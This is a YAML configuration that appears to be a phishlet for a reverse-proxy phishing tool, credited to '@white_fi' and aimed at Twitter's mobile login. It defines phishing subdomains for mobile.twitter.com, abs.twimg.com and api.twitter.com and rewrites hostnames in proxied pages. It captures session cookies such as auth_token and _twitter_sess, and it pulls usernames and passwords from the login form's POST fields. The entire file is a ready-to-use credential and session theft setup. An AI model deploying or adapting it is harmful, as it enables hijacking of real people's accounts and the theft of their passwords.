author: '@white_fi' min_ver: '2.3.0' proxy_hosts: - {phish_sub: 'mobile', orig_sub: 'mobile', domain: 'twitter.com', session: true, is_landing: true} - {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com', session: true, is_landing: false} - {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com', session: false, is_landing: false} sub_filters: - {triggers_on: 'mobile.twitter.com', orig_sub: 'mobile', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']} - {triggers_on: 'abs.twimg.com', orig_sub: 'abs', domain: 'twimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']} - {triggers_on: 'api.twitter.com', orig_sub: 'api', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']} auth_tokens: - domain: 'twitter.com' keys: ['dnt','fm','kdt','_twitter_sess','twid','auth_token'] credentials: username: key: 'session\[username_or_email\]' search: '(.*)' type: 'post' password: key: 'session\[password\]' search: '(.*)' type: 'post' login: domain: 'mobile.twitter.com' path: '/login'